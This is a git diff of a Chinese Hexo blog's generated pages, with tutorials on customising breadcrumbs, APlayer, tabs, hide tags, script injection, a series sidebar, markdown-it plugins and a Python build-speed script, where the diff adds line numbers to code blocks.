      // 查找 menus_title 中与 levelName 相同的键,并获取对应的值
      var title_obj = menus_title.find(function(item) {
      return item[levelName] !== undefined;
      });
      var title_value = title_obj ? title_obj[levelName] : null;
      if (!title_value) {
      return; // 如果找不到对应的值,直接返回,不执行后续代码
      }
      }
      }

      // 如果代码执行到这里,说明所有的值都能找到,可以继续添加元素到面包屑导航栏
      for (var i = 0; i < levels.length; i++) {
      var levelLink = '/';
      for (var j = 0; j <= i; j++) {
      levelLink += levels[j] + '/';
      }
      var levelName = decodeURIComponent(levels[i]);
      var li = document.createElement('li');
      var a = document.createElement('a');
      {
      if (i === 0) {
      a.textContent = title_value;
      } else {
      a.textContent = levelName;
      }
      if(i == levels.length - 1) {
      a.classList.add("last");
      }
      a.href = levelLink;
      }
      li.appendChild(a);
      breadcrumb.appendChild(li);
      }
      }

      function categoriesBreadcrumb()

      -
      function categoriesBreadcrumb(breadcrumb, categories, categoriesLink) {
      var li = document.createElement('li');
      var a = document.createElement('a');

      a.textContent = categories;
      a.href = categoriesLink;
      li.appendChild(a);
      breadcrumb.appendChild(li);

      li = document.createElement('li');
      a = document.createElement('a');

      a.textContent = "文章";
      a.href = window.location.href;
      a.classList.add("last");

      li.appendChild(a);
      breadcrumb.appendChild(li);
      }
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      function categoriesBreadcrumb(breadcrumb, categories, categoriesLink) {
      var li = document.createElement('li');
      var a = document.createElement('a');

      a.textContent = categories;
      a.href = categoriesLink;
      li.appendChild(a);
      breadcrumb.appendChild(li);

      li = document.createElement('li');
      a = document.createElement('a');

      a.textContent = "文章";
      a.href = window.location.href;
      a.classList.add("last");

      li.appendChild(a);
      breadcrumb.appendChild(li);
      }

      header.less

      ​ 在 hearer.less 的相应位置设置样式:

      -
      .breadcrumb {
      margin-left: 5px;
      display: flex;
      list-style: none;
      padding: 0;
      a{
      color: #898fa0;
      text-decoration: none;
      }
      .last{
      color: #12183A;
      }
      .dot {
      display: inline-block;
      width: 5px;
      height: 5px;
      border-radius: 50%;
      background: #006AFF;
      position: relative;
      top: -12px;
      left: 2px;
      }
      }

      .breadcrumb li::before {
      color: #898fa0;
      content: ">";
      margin: 0 5px;
      }
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      .breadcrumb {
      margin-left: 5px;
      display: flex;
      list-style: none;
      padding: 0;
      a{
      color: #898fa0;
      text-decoration: none;
      }
      .last{
      color: #12183A;
      }
      .dot {
      display: inline-block;
      width: 5px;
      height: 5px;
      border-radius: 50%;
      background: #006AFF;
      position: relative;
      top: -12px;
      left: 2px;
      }
      }

      .breadcrumb li::before {
      color: #898fa0;
      content: ">";
      margin: 0 5px;
      }

      ​ 修改一下对于手机端的适配:

      -
      @media screen and (max-width:660px) {
      .header {
      .header-top {
      .h-left {
      flex-grow: 3;
      }
      ...
      +
      1
      2
      3
      4
      5
      6
      7
      @media screen and (max-width:660px) {
      .header {
      .header-top {
      .h-left {
      flex-grow: 3;
      }
      ...

      效果

      customBreadcrumb

      png

      @@ -740,18 +738,18 @@

      ​ 这似乎是个通病,无论什么主题都有这种问题。

      ​ 在使用 Aplayer 的推文前面加上标记:

      -
      APlayer: true
      +
      1
      APlayer: true

      ​ 从 APlayer: APlayer 是一个简约且漂亮的 HTML5 音乐播放器,支持多种模式,包括播放列表模式、吸底模式 (gitee.com) 搞到 APlayer.min.cssAPlayer.min.js 放到对应目录下。

      ​ 修改 header.ejs

      -
      <% if(page.APlayer) { %>
      <%- css('css/third-party/APlayer.min.css') %>
      <%- js('js/third-party/APlayer.min.js') %>
      <% } %>
      +
      1
      2
      3
      4
      <% if(page.APlayer) { %>
      <%- css('css/third-party/APlayer.min.css') %>
      <%- js('js/third-party/APlayer.min.js') %>
      <% } %>

      source/_config.yml 下设置参数避免重复调用(hexo-tag-aplayer/docs/README-zh_cn.md at master · MoePlayer/hexo-tag-aplayer (github.com)

      -
      aplayer:
      asset_inject: false
      +
      1
      2
      aplayer:
      asset_inject: false

      ​ OK 了,我想 hexo-tag-map 插件也是同理,不过这个插件我不太喜欢,也很久没用了,还是不设置了。

      Giscus 评论系统

      ​ 将评论系统改成:giscus

      tabs

      ​ 使用方法:

      -
      {% tabs Unique name, [index] %}
      <!-- tab [Tab caption] [@icon] -->
      Any content (support inline tags too).
      <!-- endtab -->
      {% endtabs %}

      Unique name : Unique name of tabs block tag without comma.
      Will be used in #id's as prefix for each tab with their index numbers.
      If there are whitespaces in name, for generate #id all whitespaces will replaced by dashes.
      Only for current url of post/page must be unique!
      [index] : Index number of active tab.
      If not specified, first tab (1) will be selected.
      If index is -1, no tab will be selected. It's will be something like spoiler.
      Optional parameter.
      [Tab caption] : Caption of current tab.
      If not caption specified, unique name with tab index suffix will be used as caption of tab.
      If not caption specified, but specified icon, caption will empty.
      Optional parameter.
      [@icon] : FontAwesome icon name (full-name, look like 'fas fa-font')
      Can be specified with or without space; e.g. 'Tab caption @icon' similar to 'Tab caption@icon'.
      Optional parameter.
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      {% tabs Unique name, [index] %}
      <!-- tab [Tab caption] [@icon] -->
      Any content (support inline tags too).
      <!-- endtab -->
      {% endtabs %}

      Unique name : Unique name of tabs block tag without comma.
      Will be used in #id's as prefix for each tab with their index numbers.
      If there are whitespaces in name, for generate #id all whitespaces will replaced by dashes.
      Only for current url of post/page must be unique!
      [index] : Index number of active tab.
      If not specified, first tab (1) will be selected.
      If index is -1, no tab will be selected. It's will be something like spoiler.
      Optional parameter.
      [Tab caption] : Caption of current tab.
      If not caption specified, unique name with tab index suffix will be used as caption of tab.
      If not caption specified, but specified icon, caption will empty.
      Optional parameter.
      [@icon] : FontAwesome icon name (full-name, look like 'fas fa-font')
      Can be specified with or without space; e.g. 'Tab caption @icon' similar to 'Tab caption@icon'.
      Optional parameter.

      tab 名字为第一个 Tab

      只有图标 没有 Tab 名字

      名字+icon

      hide

      ​ 搬运自 butterfly:Butterfly 安裝文檔(三) 主題配置-1 | Butterfly

      @@ -762,7 +760,7 @@

      hide

      inline

      inline 在文本里面添加按鈕隱藏內容,只限文字

      ​ ( content 不能包含英文逗號,可用 &sbquo;)

      -
      哪個英文字母最酷?{% hideInline 因為西裝褲(C 裝酷),查看答案,#FF7242,#fff %}

      門裏站着一個人? {% hideInline 閃 %}
      +
      1
      2
      3
      哪個英文字母最酷?{% hideInline 因為西裝褲(C 裝酷),查看答案,#FF7242,#fff %}

      門裏站着一個人? {% hideInline 閃 %}

      哪個英文字母最酷?因為西裝褲(C 裝酷)

      門裏站着一個人?

      傻子,怎麼可能有答案

      @@ -778,7 +776,7 @@

      Block

      Toggle

      ​ 如果你需要展示的內容太多,可以把它隱藏在收縮框裏,需要時再把它展開。

      ​ ( display 不能包含英文逗號,可用&sbquo;)

      -
      {% hideToggle Butterfly 安裝方法 %}
      在你的博客根目錄裏

      git clone -b master https://github.com/jerryc127/hexo-theme-butterfly.git themes/Butterfly

      如果想要安裝比較新的 dev 分支,可以

      git clone -b dev https://github.com/jerryc127/hexo-theme-butterfly.git themes/Butterfly

      {% endhideToggle %}
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      {% hideToggle Butterfly 安裝方法 %}
      在你的博客根目錄裏

      git clone -b master https://github.com/jerryc127/hexo-theme-butterfly.git themes/Butterfly

      如果想要安裝比較新的 dev 分支,可以

      git clone -b dev https://github.com/jerryc127/hexo-theme-butterfly.git themes/Butterfly

      {% endhideToggle %}
      Butterfly 安裝方法

      在你的博客根目錄裏

      git clone -b master https://github.com/jerryc127/hexo-theme-butterfly.git themes/Butterfly

      如果想要安裝比較新的 dev 分支,可以

      @@ -794,16 +792,16 @@

      介绍

      如想添加额外的 js/css/meta 等等东西,可以在 Inject 里添加,支持添加到head</body> 标签之前)和 bottom</html> 标签之前)。

      请注意:以标准的 html 格式添加内容

      -
      inject:
      head:
      - <link rel="stylesheet" href="/self.css">
      bottom:
      - <script src="xxxx"></script>
      +
      1
      2
      3
      4
      5
      inject:
      head:
      - <link rel="stylesheet" href="/self.css">
      bottom:
      - <script src="xxxx"></script>

      ​ 这样还绕开了一些 JS 被加密插件搞崩的问题,真是太棒了!

      实现

      post_head.ejs 里添加:

      -
      <% if(page.inject) { %>
      <% if(page.inject.head) { %>
      <% for(let i = 0; i < page.inject.head.length; i++){ %>
      <%- page.inject.head[i] %>
      <% } %>
      <% } %>
      <% } %>
      +
      1
      2
      3
      4
      5
      6
      7
      <% if(page.inject) { %>
      <% if(page.inject.head) { %>
      <% for(let i = 0; i < page.inject.head.length; i++){ %>
      <%- page.inject.head[i] %>
      <% } %>
      <% } %>
      <% } %>

      footer.ejs 里添加:

      -
      <% if(page.inject) { %>
      <% if(page.inject.bottom) { %>
      <% for(let i = 0; i < page.inject.bottom.length; i++){ %>
      <%- page.inject.bottom[i] %>
      <% } %>
      <% } %>
      <% } %>
      +
      1
      2
      3
      4
      5
      6
      7
      <% if(page.inject) { %>
      <% if(page.inject.bottom) { %>
      <% for(let i = 0; i < page.inject.bottom.length; i++){ %>
      <%- page.inject.bottom[i] %>
      <% } %>
      <% } %>
      <% } %>

      折叠目录 2024/11/11

      ​ 现在目录终于可以像 butterfly 等主题一样折叠了!如果不想要折叠目录,需要在文章标头设置:

      -
      toc_collapsed: false
      +
      1
      toc_collapsed: false

      其它

      ​ 这个插件可以让 Hexo 使用 Markdown-it 渲染器来渲染文章,这提供了从 Markdown 语法到 html 语法转换更丰富的规则,真是太厉害了!卸载掉之前的渲染器,安装它!

      -
      npm install hexo-renderer-markdown-it
      +
      1
      npm install hexo-renderer-markdown-it

      自带插件介绍

      ​ 安装这个插件后,默认包括了如下 Markdown-it 插件:

        @@ -416,7 +414,7 @@

        markdown-it-attrs
        这个插件允许你在 Markdown 元素(如标题、段落、代码块等)上添加自定义的 HTML 属性。通过这种方式,你可以为 Markdown 语法元素添加类、ID 和其他 HTML 属性。例如:

        -
        ## Example {#custom-id .custom-class}
        +
        1
        ## Example {#custom-id .custom-class}

        会为该标题添加自定义的 ID 和类名。

      1. @@ -430,7 +428,7 @@

        markdown-it-deflist
        该插件支持 Markdown 的定义列表语法。定义列表通常用于展示术语及其定义。语法为:

        -
        term1
        : definition1

        term2
        : definition2
        +
        1
        2
        3
        4
        5
        term1
        : definition1

        term2
        : definition2

      2. markdown-it-emoji
        @@ -461,14 +459,14 @@

        ​ 这些插件扩展了 markdown-it 的功能,使其在处理 Markdown 文本时更加灵活,能够更好地支持各种格式和渲染需求。如果你在使用 markdown-it 时有特别的需求,可以考虑根据实际情况选择合适的插件。

        获取其它插件

        ​ 当然,我们也可以从 MarkdownIt 插件 | Markdown It 插件 获取想要的插件:

        -
        npm install markdown-it-task-lists
        npm install markdown-it-github-alerts
        npm install markdown-it-anchor
        npm install markdown-it-footnote
        +
        1
        2
        3
        4
        npm install markdown-it-task-lists
        npm install markdown-it-github-alerts
        npm install markdown-it-anchor
        npm install markdown-it-footnote

        使用插件

        ​ 如果需要启用它们(其中若干),则在项目根目录下的 _config.yml 启动它!

        ​ 这里我们根据 基本撰写和格式语法 - GitHub 文档Typora Support 引入一些符合 Github 编写规范和 Typora 支持的语法插件:

        -
        # Markdown-it config
        markdown:
        plugins:
        - markdown-it-sub # 下标
        - markdown-it-sup # 上标
        - markdown-it-mark # 高亮
        - markdown-it-task-lists # 任务列表
        - markdown-it-github-alerts # github 警告框
        - markdown-it-anchor # 目录锚点
        - markdown-it-footnote # 角标
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        # Markdown-it config
        markdown:
        plugins:
        - markdown-it-sub # 下标
        - markdown-it-sup # 上标
        - markdown-it-mark # 高亮
        - markdown-it-task-lists # 任务列表
        - markdown-it-github-alerts # github 警告框
        - markdown-it-anchor # 目录锚点
        - markdown-it-footnote # 角标

        ​ 在引入相应的渲染插件后,设计并引入好对应 Html 结构的 CSS 和 JS 即可。

        示例

        -
        NH~4~^+^

        - [ ] 这个任务还没做
        - [x] 这个任务做完了

        ==我是高亮文本==

        Here is a simple footnote[^1].

        A footnote can also have multiple lines[^2].

        [^1]: My reference.
        [^2]: To add line breaks within a footnote, prefix new lines with 2 spaces.
        This is a second line

        > [!NOTE]
        > Highlights information that users should take into account, even when skimming.

        > [!TIP]
        > Optional information to help a user be more successful.

        > [!IMPORTANT]
        > Crucial information necessary for users to succeed.

        > [!WARNING]
        > Critical content demanding immediate user attention due to potential risks.

        > [!CAUTION]
        > Negative potential consequences of an action.
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        NH~4~^+^

        - [ ] 这个任务还没做
        - [x] 这个任务做完了

        ==我是高亮文本==

        Here is a simple footnote[^1].

        A footnote can also have multiple lines[^2].

        [^1]: My reference.
        [^2]: To add line breaks within a footnote, prefix new lines with 2 spaces.
        This is a second line

        > [!NOTE]
        > Highlights information that users should take into account, even when skimming.

        > [!TIP]
        > Optional information to help a user be more successful.

        > [!IMPORTANT]
        > Crucial information necessary for users to succeed.

        > [!WARNING]
        > Critical content demanding immediate user attention due to potential risks.

        > [!CAUTION]
        > Negative potential consequences of an action.

        NH4+

        • 这个任务还没做
        • @@ -4489,6 +4487,8 @@

          目录

          var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Hexo-\344\276\247\350\276\271\346\240\217/index.html" "b/posts/Hexo-\344\276\247\350\276\271\346\240\217/index.html" index e3b6c2ef27..38c9cc1f97 100644 --- "a/posts/Hexo-\344\276\247\350\276\271\346\240\217/index.html" +++ "b/posts/Hexo-\344\276\247\350\276\271\346\240\217/index.html" @@ -51,8 +51,6 @@ - - @@ -417,7 +415,7 @@

          前言

          布局

          post_centent

          post_centent.ejs 的内容如下:

          -
          <div class="post-content">
          <article class="post-content-info">
          <%- page.content %>
          <%- partial('widget/comments'); %>
          </article>
          <% if(page.aside != false) { %>
          <%- partial('_partial/post_aside'); %>
          <% } %>
          </div>
          +
          1
          2
          3
          4
          5
          6
          7
          8
          9
          <div class="post-content">
          <article class="post-content-info">
          <%- page.content %>
          <%- partial('widget/comments'); %>
          </article>
          <% if(page.aside != false) { %>
          <%- partial('_partial/post_aside'); %>
          <% } %>
          </div>

          ​ 一个 <div class="post-content"> 存储主体信息。

          • <article class="post-content-info"> 正文内容。
          • @@ -429,38 +427,38 @@

            post_centent


          ​ 当屏幕宽度大于 960px 时,.post-content 使用弹性布局,将侧边栏放在正文内容右边:

          -
          display: flex;
          margin: -100px auto 95px;
          width: 100%;
          justify-content: center;
          +
          1
          2
          3
          4
          display: flex;
          margin: -100px auto 95px;
          width: 100%;
          justify-content: center;

          ​ 当屏幕宽度下于 960px 时,将“侧边栏”放在正文内容下边(像 butterfly 那么做):

          -
          flex-direction: column;
          +
          1
          flex-direction: column;

          post_aside

          post_aside.ejs 下的内容(简略):

          -
          <div class="aside">
          <%- js('js/widget/aside.js'); %>
          <script>
          showAside();
          </script>

          <div class="aside-top">
          <div class="aside-top-about aside-card">
          ...
          </div>
          </div>

          <% if(page.series) { %>
          <div class="aside-top-series aside-card">
          ...
          </div>

          <div class="aside-bottom">
          <% if(page.toc) { %>
          ...
          <div class="aside-bottom-toc aside-card">
          ...
          </div>
          <% } %>
          </div>
          </div>
          +
          1
          2
          3
          4
          5
          6
          7
          8
          9
          10
          11
          12
          13
          14
          15
          16
          17
          18
          19
          20
          21
          22
          23
          24
          25
          26
          <div class="aside">
          <%- js('js/widget/aside.js'); %>
          <script>
          showAside();
          </script>

          <div class="aside-top">
          <div class="aside-top-about aside-card">
          ...
          </div>
          </div>

          <% if(page.series) { %>
          <div class="aside-top-series aside-card">
          ...
          </div>

          <div class="aside-bottom">
          <% if(page.toc) { %>
          ...
          <div class="aside-bottom-toc aside-card">
          ...
          </div>
          <% } %>
          </div>
          </div>

          <div class="aside"> 下有:

          • <div class="aside-top">,这个是相对布局:
          -
          position: relative;
          z-index: 2;
          margin-left: 20px;
          width: min(260px, 20vw);
          +
          1
          2
          3
          4
          position: relative;
          z-index: 2;
          margin-left: 20px;
          width: min(260px, 20vw);
          • <div class="aside-bottom">,这个是 sticky 布局,主要是让视图滚动时也能显示目录。
          -
          position: sticky;
          top: 80px;
          margin-left: 20px;
          width: min(260px, 20vw);
          +
          1
          2
          3
          4
          position: sticky;
          top: 80px;
          margin-left: 20px;
          width: min(260px, 20vw);

          aside-card

          -
          width: calc(100% - 20px);
          border-radius: 10px;
          background: var(--background-primary);
          box-shadow: 0 1px 3px hsla(0, 0%, 7%, 0.1);
          padding: 10px;
          border: 1px solid rgba(18, 24, 58, 0.06);
          transition: background 0.3s ease-out;
          +
          1
          2
          3
          4
          5
          6
          7
          width: calc(100% - 20px);
          border-radius: 10px;
          background: var(--background-primary);
          box-shadow: 0 1px 3px hsla(0, 0%, 7%, 0.1);
          padding: 10px;
          border: 1px solid rgba(18, 24, 58, 0.06);
          transition: background 0.3s ease-out;

          ​ 写一个侧边栏卡片样式。

          Series 标签

          ​ 我设计了一个新的文章属性:series!据我所知,这个功能还是我独创的。

          -
          series: Hexo
          +
          1
          series: Hexo

          ​ 这个 series 的值必须在 tags 里存在,算是一个文章的系列标签,或是我学习一门重要技术时探索的时间线。

          -
          <ol class="series">
          <% let serialNumber = 0; %>
          <% let seriesCount = 0; %>
          <% let find = false; %>
          <% site.posts.sort('date').forEach(function(post) { %>
          <% if (post.series === page.series) { %>
          <% seriesCount += 1; %>
          <% if (!find) {serialNumber += 1;} %>
          <% if (post.path === page.path) { %>
          <% find = true; %>
          <li class="series-item active">
          <a class="series-link active" href="/<%= post.path %>">
          &nbsp;&nbsp;<span class="text"><%= post.title %></span>
          </a>
          </li>
          <% } else { %>
          <li class="series-item">
          <a class="series-link" href="/<%= post.path %>">
          &nbsp;&nbsp;<span class="text"><%= post.title %></span>
          </a>
          </li>
          <% } %>
          <% } %>
          <% }); %>
          </ol>
          +
          1
          2
          3
          4
          5
          6
          7
          8
          9
          10
          11
          12
          13
          14
          15
          16
          17
          18
          19
          20
          21
          22
          23
          24
          25
          <ol class="series">
          <% let serialNumber = 0; %>
          <% let seriesCount = 0; %>
          <% let find = false; %>
          <% site.posts.sort('date').forEach(function(post) { %>
          <% if (post.series === page.series) { %>
          <% seriesCount += 1; %>
          <% if (!find) {serialNumber += 1;} %>
          <% if (post.path === page.path) { %>
          <% find = true; %>
          <li class="series-item active">
          <a class="series-link active" href="/<%= post.path %>">
          &nbsp;&nbsp;<span class="text"><%= post.title %></span>
          </a>
          </li>
          <% } else { %>
          <li class="series-item">
          <a class="series-link" href="/<%= post.path %>">
          &nbsp;&nbsp;<span class="text"><%= post.title %></span>
          </a>
          </li>
          <% } %>
          <% } %>
          <% }); %>
          </ol>

          ​ 渲染时会查找所有跟 series 相同的文章并按时间顺序排列后放到侧边栏中,便于读者快速找到其它相关文章。

          自定义侧边栏

          ​ 现在文章通过 JS 可以自定义侧边栏!原理就是使用 JS 往 <div class="aside-top"><div class="aside-bottom"> 下面插入 <div class="aside-card">

          ​ 由于渲染顺序的关系,只能在文章属性的 inject.bottom 里设置相应的 JS 逻辑(这个功能是抄 butterfly 的)(虽然把逻辑放到前端会拖慢网页加载速度,但我觉得这么写不会显得那么屎山,而且就这么点代码问题也不大你说是不是)。

          -
          inject:
          bottom:
          - <script type="text/javascript" src="test_aside.js"></script>
          +
          1
          2
          3
          inject:
          bottom:
          - <script type="text/javascript" src="test_aside.js"></script>
          -
          function createNode_1() {
          var e_0 = document.createElement("div");
          e_0.setAttribute("class", "poem aside-card");
          var e_1 = document.createElement("div");
          e_1.setAttribute("class", "top");
          var e_2 = document.createElement("h1");
          e_2.appendChild(document.createTextNode("长安古意"));
          e_1.appendChild(e_2);
          var e_3 = document.createElement("span");
          e_3.appendChild(document.createTextNode("唐·卢照邻"));
          e_1.appendChild(e_3);
          e_0.appendChild(e_1);
          var e_4 = document.createElement("p");
          e_4.appendChild(document.createTextNode("\n长安大道连狭斜,"));
          var e_5 = document.createElement("br");
          e_4.appendChild(e_5);

          ...

          e_4.appendChild(document.createTextNode("飞来飞去袭人裾。"));
          var e_72 = document.createElement("br");
          e_4.appendChild(e_72);
          e_0.appendChild(e_4);
          return e_0;
          }

          function createNode_2() {
          var e_0 = document.createElement("div");
          e_0.setAttribute("class", "poem aside-card");
          var e_1 = document.createElement("div");
          e_1.setAttribute("class", "top");
          var e_2 = document.createElement("h1");
          e_2.appendChild(document.createTextNode("春江花月夜"));
          e_1.appendChild(e_2);
          var e_3 = document.createElement("span");
          e_3.appendChild(document.createTextNode("唐·张若虚"));
          e_1.appendChild(e_3);
          e_0.appendChild(e_1);
          var e_4 = document.createElement("p");
          e_4.appendChild(document.createTextNode("\n春江潮水连海平,"));
          var e_5 = document.createElement("br");
          e_4.appendChild(e_5);

          ...

          e_4.appendChild(document.createTextNode("落月摇情满江树。"));
          var e_40 = document.createElement("br");
          e_4.appendChild(e_40);
          e_0.appendChild(e_4);
          return e_0;
          }

          function createNode_3() {
          var e_0 = document.createElement("div");
          e_0.setAttribute("class", "poem aside-card");
          var e_1 = document.createElement("div");
          e_1.setAttribute("class", "top");
          var e_2 = document.createElement("h1");
          e_2.appendChild(document.createTextNode("音乐"));
          e_1.appendChild(e_2);
          var e_3 = document.createElement("div");
          const ap = new APlayer({
          container: e_3,
          audio: [{
          name: '梦之津渡',
          artist: '啃书',
          url: '/musics/梦之津渡.mp3',
          cover: '/musics/梦之津渡.jpg'
          }]
          });
          e_0.appendChild(e_3);
          return e_0;
          }

          $(document).ready(function() {
          document.querySelector(".aside-top").appendChild(createNode_1());
          document.querySelector(".aside-bottom").appendChild(createNode_2());
          var parentElement = document.querySelector(".aside-bottom");
          var firstChild = parentElement.firstChild;
          parentElement.insertBefore(createNode_3(), firstChild);
          });
          +
          1
          2
          3
          4
          5
          6
          7
          8
          9
          10
          11
          12
          13
          14
          15
          16
          17
          18
          19
          20
          21
          22
          23
          24
          25
          26
          27
          28
          29
          30
          31
          32
          33
          34
          35
          36
          37
          38
          39
          40
          41
          42
          43
          44
          45
          46
          47
          48
          49
          50
          51
          52
          53
          54
          55
          56
          57
          58
          59
          60
          61
          62
          63
          64
          65
          66
          67
          68
          69
          70
          71
          72
          73
          74
          75
          76
          77
          78
          79
          80
          81
          function createNode_1() {
          var e_0 = document.createElement("div");
          e_0.setAttribute("class", "poem aside-card");
          var e_1 = document.createElement("div");
          e_1.setAttribute("class", "top");
          var e_2 = document.createElement("h1");
          e_2.appendChild(document.createTextNode("长安古意"));
          e_1.appendChild(e_2);
          var e_3 = document.createElement("span");
          e_3.appendChild(document.createTextNode("唐·卢照邻"));
          e_1.appendChild(e_3);
          e_0.appendChild(e_1);
          var e_4 = document.createElement("p");
          e_4.appendChild(document.createTextNode("\n长安大道连狭斜,"));
          var e_5 = document.createElement("br");
          e_4.appendChild(e_5);

          ...

          e_4.appendChild(document.createTextNode("飞来飞去袭人裾。"));
          var e_72 = document.createElement("br");
          e_4.appendChild(e_72);
          e_0.appendChild(e_4);
          return e_0;
          }

          function createNode_2() {
          var e_0 = document.createElement("div");
          e_0.setAttribute("class", "poem aside-card");
          var e_1 = document.createElement("div");
          e_1.setAttribute("class", "top");
          var e_2 = document.createElement("h1");
          e_2.appendChild(document.createTextNode("春江花月夜"));
          e_1.appendChild(e_2);
          var e_3 = document.createElement("span");
          e_3.appendChild(document.createTextNode("唐·张若虚"));
          e_1.appendChild(e_3);
          e_0.appendChild(e_1);
          var e_4 = document.createElement("p");
          e_4.appendChild(document.createTextNode("\n春江潮水连海平,"));
          var e_5 = document.createElement("br");
          e_4.appendChild(e_5);

          ...

          e_4.appendChild(document.createTextNode("落月摇情满江树。"));
          var e_40 = document.createElement("br");
          e_4.appendChild(e_40);
          e_0.appendChild(e_4);
          return e_0;
          }

          function createNode_3() {
          var e_0 = document.createElement("div");
          e_0.setAttribute("class", "poem aside-card");
          var e_1 = document.createElement("div");
          e_1.setAttribute("class", "top");
          var e_2 = document.createElement("h1");
          e_2.appendChild(document.createTextNode("音乐"));
          e_1.appendChild(e_2);
          var e_3 = document.createElement("div");
          const ap = new APlayer({
          container: e_3,
          audio: [{
          name: '梦之津渡',
          artist: '啃书',
          url: '/musics/梦之津渡.mp3',
          cover: '/musics/梦之津渡.jpg'
          }]
          });
          e_0.appendChild(e_3);
          return e_0;
          }

          $(document).ready(function() {
          document.querySelector(".aside-top").appendChild(createNode_1());
          document.querySelector(".aside-bottom").appendChild(createNode_2());
          var parentElement = document.querySelector(".aside-bottom");
          var firstChild = parentElement.firstChild;
          parentElement.insertBefore(createNode_3(), firstChild);
          });

          ​ 这段代码可以让你在侧边栏感受中华优秀传统文化!还可以听听音乐!

          @@ -4454,6 +4452,8 @@

          目录

          var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Hexo-\345\206\231\347\202\271\345\267\245\345\205\267\345\212\240\345\277\253 hexo g \347\232\204\351\200\237\345\272\246/index.html" "b/posts/Hexo-\345\206\231\347\202\271\345\267\245\345\205\267\345\212\240\345\277\253 hexo g \347\232\204\351\200\237\345\272\246/index.html" index 7859fa847a..71682430fc 100644 --- "a/posts/Hexo-\345\206\231\347\202\271\345\267\245\345\205\267\345\212\240\345\277\253 hexo g \347\232\204\351\200\237\345\272\246/index.html" +++ "b/posts/Hexo-\345\206\231\347\202\271\345\267\245\345\205\267\345\212\240\345\277\253 hexo g \347\232\204\351\200\237\345\272\246/index.html" @@ -44,8 +44,6 @@ - - @@ -416,26 +414,26 @@

          代码

          ​ 在博客文件夹根目录下创建一个 ./tools 文件夹,里面创建一个 quick_complie.py,里面写上这些神奇代码!

          python

          导入相关库、定义变量

          -
          import os
          import shutil
          from tqdm import tqdm
          import subprocess
          import yaml

          ignore_folder = ['musics'] # 不处理 source/musics 这个文件夹
          ignore_type = ['md', 'ejs'] # 不处理 .md 和 .ejs 类型的文件
          +
          1
          2
          3
          4
          5
          6
          7
          8
          import os
          import shutil
          from tqdm import tqdm
          import subprocess
          import yaml

          ignore_folder = ['musics'] # 不处理 source/musics 这个文件夹
          ignore_type = ['md', 'ejs'] # 不处理 .md 和 .ejs 类型的文件

          前处理

          ​ 下面这段代码会将 source/ 下不需要 hexo g 处理的文件移动到 temp/ 下。

          -
          def move_non_md_files(src, dst):
          os.makedirs(dst, exist_ok=True)
          # 遍历源文件夹中的所有文件和子文件夹
          for item in os.listdir(src):
          # 构建源文件/文件夹的完整路径
          src_item = os.path.join(src, item)
          # 构建目标文件/文件夹的完整路径
          dst_item = os.path.join(dst, item)

          # 如果是文件夹,则递归地复制文件夹
          if os.path.isdir(src_item):
          move_non_md_files(src_item, dst_item)
          # 如果是文件且不是 ignore_type 类型下的文件,则复制文件
          elif os.path.isfile(src_item) and src_item.split('.')[-1] not in ignore_type:
          shutil.move(src_item, dst)


          print("处理文件……")
          if os.path.isdir('../temp'):
          shutil.rmtree('../temp')

          for item in tqdm(os.listdir('../source')):
          if item not in ignore_folder:
          item_path = os.path.join('../source', item)
          # 判断是否为文件夹
          if os.path.isdir(item_path):
          try:
          move_non_md_files(item_path, os.path.join('../temp',item))
          except Exception as e:
          print(item_path + ":", e)

          print("完成!")
          +
          1
          2
          3
          4
          5
          6
          7
          8
          9
          10
          11
          12
          13
          14
          15
          16
          17
          18
          19
          20
          21
          22
          23
          24
          25
          26
          27
          28
          29
          30
          31
          32
          def move_non_md_files(src, dst):
          os.makedirs(dst, exist_ok=True)
          # 遍历源文件夹中的所有文件和子文件夹
          for item in os.listdir(src):
          # 构建源文件/文件夹的完整路径
          src_item = os.path.join(src, item)
          # 构建目标文件/文件夹的完整路径
          dst_item = os.path.join(dst, item)

          # 如果是文件夹,则递归地复制文件夹
          if os.path.isdir(src_item):
          move_non_md_files(src_item, dst_item)
          # 如果是文件且不是 ignore_type 类型下的文件,则复制文件
          elif os.path.isfile(src_item) and src_item.split('.')[-1] not in ignore_type:
          shutil.move(src_item, dst)


          print("处理文件……")
          if os.path.isdir('../temp'):
          shutil.rmtree('../temp')

          for item in tqdm(os.listdir('../source')):
          if item not in ignore_folder:
          item_path = os.path.join('../source', item)
          # 判断是否为文件夹
          if os.path.isdir(item_path):
          try:
          move_non_md_files(item_path, os.path.join('../temp',item))
          except Exception as e:
          print(item_path + ":", e)

          print("完成!")

          hexo cl & hexo g

          ​ 使用 python 调用 hexo clhexo g 命令。

          -
          print("hexo cl……")
          print(subprocess.run('hexo cl', shell=True, capture_output=True, text=True, encoding='utf-8').stdout)
          print("完成!")
          print("hexo g……")
          print(subprocess.run('hexo g', shell=True, capture_output=True, text=True, encoding='utf-8').stdout)
          print("完成!")
          +
          1
          2
          3
          4
          5
          6
          print("hexo cl……")
          print(subprocess.run('hexo cl', shell=True, capture_output=True, text=True, encoding='utf-8').stdout)
          print("完成!")
          print("hexo g……")
          print(subprocess.run('hexo g', shell=True, capture_output=True, text=True, encoding='utf-8').stdout)
          print("完成!")

          后处理

          ​ 下面这段代码会将 temp/ 下的文件拷贝回 source/public/ 下的对应位置,最后删除 temp/

          后处理 _posts

          ​ 对于 _posts 下的文件,temp/public/ 的路径不是一一对应的,要按照对应的规则拷贝。

          -
          print("后处理 _post 文件……")

          md_list = []
          for item in os.listdir('../source/_posts'):
          if item.endswith('.md'):
          md_list.append(item)

          for item in tqdm(md_list):
          try:
          # 读取 Markdown 文件内容
          with open(os.path.join('../source/_posts', item), 'r', encoding='utf-8') as file:
          content = file.read()
